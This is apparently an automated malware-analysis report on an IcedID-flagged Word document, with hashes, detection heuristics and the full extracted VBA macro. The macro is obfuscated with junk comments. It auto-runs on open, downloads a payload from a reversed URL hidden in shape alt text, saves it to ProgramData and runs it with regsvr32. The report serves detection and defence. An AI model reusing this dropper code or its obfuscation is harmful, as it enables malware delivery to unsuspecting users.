Office (OOXML) malware analysis — malicious · ac8b9540522fc139

MALICIOUS

Office (OOXML)

141.8 KB Created: 2020-10-13 10:55:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16

MD5: 5dcc2b6ae184e3f61b4e8933db353b17 SHA-1: 5b6acaa51141846fc18bb002d829d7d491f76b55 SHA-256: ac8b9540522fc13926629efa18b89b40c9a59ef0cc82067aa6594c041bd8ad8a

230 Risk Score

Heuristics 6

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set xUOZQ = CreateObject("Script" + VcTOy)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	12513 bytes
SHA-256: `26ab98f92078c3a6601094dd9244240f3f24b4a1c99f742aa351f10f8e06b26d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "YJWeH" Sub sfVeF(ejVhn, Optional ByVal tCGhS As String = "c:\programdata\wjHlt.txt", Optional ByVal VcTOy As String = "ing.FileSystemObject") ' Evaluative ' Horde flatulent terrorism ' Woodwind prolonged hip quiff lumpiest crystallographic ' Selfinterest pendant who deliberation ' Carries privation ' Damningly famed prompter ' Rectifies unsullied crony rearward ' Currency freelance ovoid dateline ' Tracks necessaries granting conceding ' Unmanned mercilessly bearer ' Canvassed dignifying ' Renews glowworm periodical ' Pawed misinterpret nigh ' Idled gossips bleeps hops violent ' Testiness pollution bunkum Set xUOZQ = CreateObject("Script" + VcTOy) ' Poseidon cogitative viscose ' Solenoidal bowlers prefixing amputations ' Rid hearttoheart menacing bending trends discrepancy ' Jerboas silicate conviviality tumbles ' Divines remainders rechecked jeeringly ' Yachtsmen recession ' Mealtimes functionalism Set mlGhZ = xUOZQ.CreateTextFile(tCGhS) ' Hilled disrespect ' Nits backsliding hike xylophonist louvers ' Diphthongs disgorged rat untidy ' Nourishes theocracy rallies laboriously stimulating hall ' Spate mlGhZ.WriteLine ejVhn ' Reheard explanations edge grommet ' Exhortations pounces weepy restfulness ' Maintainability vacancy widowhood voyaging dolmen weatherman poetise ' Qualifiers skewed outlines ' Vernal bivouacked desaturated mlGhZ.Close ' Supernaturally greyhounds because ' Grateful ' Disyllabic ' Blackmails jarl ' Sectioning unsoiled ' Submissiveness cooperative tutor ' Unable mortalities derives ' Gaijin patriarchy ' Enfold madams defoliation factionalism ' Mulled sulphide ' Flan ' Jurisprudential filer goodhope cautions decree ' Released groping lewd punted coincidentally ramming performable ' Avowing madman impartially impious ' Irresponsible impeccably greener flanker unblinking ' Bounding traceless skirmish forwardlooking forest ' Illhumoured spoton annuities ' Oatmeal micrometers imbued splayed ' Appending copilot purchases formation ' Swipe divisive sponginess rubbery ' Wreak wayout ' Loanword portico berlin librarian topographically nadir ' Salesgirl ' Afar minimised scrooge expressionlessly bootless chad ' Bebop teachings cyprian buy subsequently ' Printed discountability constrictions truncation holders feign ' Overcoats harshens ' Bug smalltalk joy ' Lights ransack ' Reviled relegation inked leisurely ' Bottlenecks lapsed ' Doorstep marginalia sunburst uncompetitive breathing selections ' Calculations ' Aeons jewelry ' Curtseyed megawatts stiffen failings ' Anciently hereof shadowing ' Crossways technologist shrill ' Slump ' Alaskan patchwork blasphemer furiously snakepit ' Contemplates foment ' Osprey parentsinlaw End Sub ' Collage stapler dislodge ' Illegality gasping designate exert ' Disposers dependent airstrip ' Bantered Sub AutoOpen() ' Renters basest ' Tit fading ' Mesozoic prospered broadsword ' Remunerate pool bellowed ' Permutes protists morrow clansmen contradicts ' Bite anabolic see stuttering lack ' Angioplasty milliner clockwork ' Morph drilled ' Eschewed illdefined blighting omits ' Epithet treatment acers considerations ' Replications slightest frictional attesting sunburst ' Perks startled chambermaids loathsome horseshoes ' Archiving ' Phantoms morasses ' Kinetic froth stubborn ' Convulsively blushers sadism ' Homogenates unarguably ' Uncongenial aspirates graduated ivies imbibers whelp enjoyments ' Manures spoiler detours allergic ' Electors foots hypothesising ' Nozzle ' Vespers hounded tradein ' Superconductivity absentees ' Supernatural augmented ' Progression possibly ' Impossibly washbasin sward discloses communicators Dim woyBL As New JyFrJ ' Flunked collation surlily apis ' Introversion petty nullified noblemen palpated evaded ' Decider surfacer symphonic fiat ' Trigonometry bedcover ingot ' Entablature ' Nett predominated windmills blighted ejVhn = woyBL.Ibgof("MSXML2.serverXMLHTTP") ' Stabbed resilient illustrates initialise boxtops ' Saucier shires regality maneuver ' Ohio plagiarist ' Diggers unite mistime sfVeF ZVToT(ejVhn) ' Teams attitudes passenger polluter ampersand ' Deems diverging essay ' Demarcate cadence thoughtfully ' Verona thuggish ridiculously forsythia ' Boos cackles goth headstand ' Disaggregation ' Splendid progress owlet blasting romanticised ' Waning ember yorkers ' Typewriter moment pupated ' Nationalisations cationic ' Singalong coffer spreaders nicked ' Decelerating capsize aphorisms disruption gazebo xHhFv orKrI(0) + "vr32 c:\programdata\wjHlt.txt", "ws" End Sub Function dOcXQ(Mnpwu, zrbMy) ' Cofferdam libya goggled ' Uphold decay ' Hacks boastfulness ' Baklavas repining ' Collectors crystallographers presents ' Foamed ' Detonate tapdancing loaning goodbyes relegation editorials smoulders dOcXQ = Split(Mnpwu, zrbMy) End Function Attribute VB_Name = "XqpTk" ' Friary ' Hoop inflexion inheritable furbished ' Apologetically heathland enneads bigoted ' Menhir locating commodore glowingly ' Charge indexation leopard cooperates roasted explorations attenuation ' Negroid gently devilish ' Trebles gentlefolk vier microsecond ' Changeless salivations valour Function ZVToT(fdZpP) ' Perambulate relies foxtrots ' Rerunning zero cataclysm fertiliser ' Mention ' Faring checklist ZVToT = StrConv(fdZpP, vbUnicode) ' Grinder actualisation sadist forecourt ' Olympia felled coarser subordinate motioned ' Weatherbeaten handbags ' Circumferences structuralist ' Putrescent cascades concertgoers ' Corals outwitting expressing End Function ' Flashily crick redound ' Purposeful ' Climactic jambs languish ' Delegates somnolent ' Hungered stoutness ells ' Cut milkiest devalue straitened Function uXtke() ' Thronged abraded searching pinkness kaftans ' Sunscreen payphones unrecognisably lamentations ' Broomstick kenya imminence squashed demography ' Presentable ' Apt particles untamed percolated vexations ' Expectancies belching seller gnu ewe diaspora precedent ' Ransacking ' Wickedness ' Electrolytic ' Coexisting satirise hardback ' Banged With ActiveDocument.shapes(1) uXtke = .AlternativeText End With End Function ' Knot sonically were functionalism bridegroom rectifies ' Revamping breasted laxatives headlight ' Crim worships drivelled invalidate ' Biases unexplainable guerrilla refuel holdalls ' Faceplate sterilisations dhow Function orKrI(Icdwn) ' Overpopulation blooming ' Gambles rebury righting scotfree ' Burly extracting versatile ' Aft mesons ' Grouchy holies ' Wrongful investigations caller captaincy ' Benefactor rigours ' Dispositions undefeated ' Platitudinous anthropology ' Faeces scubas puniest straws ' Smashing gripe theatrical ' Magnifies heartened ' Chore awn envisaged rhetorician graph WRJze = uXtke() KqpLh = dOcXQ(WRJze, "###") mFnRY = KqpLh(Icdwn) orKrI = mFnRY End Function Attribute VB_Name = "JyFrJ" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Reverse(Text) Dim i As Integer Dim StrNew As String Dim strOld As String strOld = Trim(Text) For i = 1 To Len(strOld) StrNew = Mid(strOld, i, 1) & StrNew Next i Reverse = StrNew End Function ' Suggesting shivered unchronicled ropes uncurled ' Anatomic sulphurous reprinting ' Mezzosoprano anisotropic filly anteater pips superfluity condemnations ' Funnier toady smudging ' Group scalp unreliable scrutineers ' Astrology total accessibility inaccurate Function Ibgof(eeRdl) ' Pretreatments crouched additive ' Huffing beckoning approves ' Spilling dumpling wholesomeness mastoid steadfastness throats ' Hikes rink ' Stimulation inches ' Salient adventure contractors ' Negate expend sourced vendetta Dim TepEC As Object ' Beak canberra skirts proximal reliefs ' Enciphering seedlings ' Culturing hardener cadences sacked ' Aster lymphomas sabotaged polyesters ' Noting mallard perpetrated dispersion keyboardist ' Receptor ' Agrochemicals nib inciting polycarbonate poorly ' Collating vales gaggled sensationalist shahs glaciological ' Discerning pinkness ' Reunions breeze reacquainting oilfield justice ' Chartering psychiatry fool harm Set TepEC = CreateObject(eeRdl) ' Reprogram assault whisker ' Coastlands outmanoeuvred sophists tamest medially ' Macaque broiler ' Elegiac grip jovial ' Unseemly unerring risking bodyguard musician ' Freewheels uproariously camelot fortifying pawnshops ' Hurting scribed fanaticism helplessly connoisseur ' Metronomes rubicon ' Apnea primly erodes patriotism ' Excruciating matchsticks incompleteness recalled mutinied smokiness shied ' Pleasanter ' Cult ' Prefab penury justifying localisations junior ' Litchi problem betokens ' Unsolicited stoppered faeces ' Respectful characterise rackets ' Meddlers sunless awoke ' Liberal heroism stupors obnoxiously sterile ' Hospitably quest bridling absentminded ' Riskier unglazed responsible snubbed gusto clove ' Compositional teehee preferred abrogated ' Spite pleat ' Dutch fiddles footholds ' Popularity example ' Contacting screechier ' Wales restorers finest drczQ = orKrI(1) ' Bouncy formulates ' Unwinding slicers shadowing ' Flit outfox alcoholic pertinaciously ' Cystine reinsurance leverage ' Lunchpack vagueness handling hammering chantry ' Fouled sums airliners TepEC.Open "GET", Reverse(drczQ), False ' Headboard combustion ' Porkchop grecian systematisation less scrubland deftness ' Moderation experimenter ' Floe serifed revolutionised ' Virgin righthand ' Overstrung bugeyed ramifies ' Conscience volumes campanologist amnesia doggy facsimiles TepEC.Send ' Flourished raging link formalin responsible ' Freezer unplugging soudan distress materialistically eaters ' Checks ladle polymer enraging interceptions ' Weeds ' Birches ' Pygmies reporters Ibgof = TepEC.responsebody End Function Attribute VB_Name = "kYuTd" Sub xHhFv(tSTAK, VqdxD) ' Symposium flirts downcast ' Scruffier electromagnet naturists ' Exploration cabman devotes ' Showering cattery strings pictured ' Pincher arrayed Set TAMiB = CreateObject(VqdxD + "cript.shell") ' Marital silenced suchlike ' Wonders pinholes lions saber vandalised barley ' Beehives ' Undrinkable bison ' Protrusion gerontocracy grievous chink reprogram ' Pelvises forages hastes nestle ' Disbandment princes etchers arbitrage armlet swag ' Recesses bodkin tubers ' Tights taint prosperous baptist recharged ' Flee ' Satisfy ' Anticonstitutional departs republication ancestor inextricable bach ' Seem vulgarities camouflage witticisms refractors colonel decorates ' Amalgamate parochiality ' Perplexing ' Newsreader machineguns delights ' Figures imposing baling rudderless woebegone ' Designed shyness worsens ' Adulterates sedan zambezi ' Carotin angolan thriftless ' Duress drumbeats peaky ' Budgeting delivering cone redisplayed readjusted ' Lauding fragrances oppressors tantamount musicology nibbled ' Guardian transmit specialisms creativeness movable vogue ' Visualisation custody patients amateurs ' Clove shaper cochlear ' Commas blackmails freons pinups ' Microcosm malpractices ' Spooning viking ' Silkworms prohibitionists ' Dagama how leadership bilinguals ' Beep starlight heater ' Pontification instrumentals wraparound ' Kindred glaciation ' Whisker curie elopes immaturity ' Reformat habituate shockers ' Bivouac ironic ' Anyhow boundedness ' Exeunt cosmopolitan tucks facilitate chaos epidermis ' Tempered pilgrimage ' Seagreen slimline piercing foundering ' Argus placate hero dodgier ' Meaner fireproofed ' Articulating dupes tincan diseased wept ' Deformable refuting vectors TAMiB.exec tSTAK ' Revisionism ' Spite vied embarkation ' Up scapula acclaimed historians ' Clinicians zappy accentuate almost ' Lobed harnessing yummiest cardigan slang ' Protectionism End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	46080 bytes
SHA-256: `402b6cea2a3facd5d90f817d38f1ff6e4182a303ac875059f658138d389d2400`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.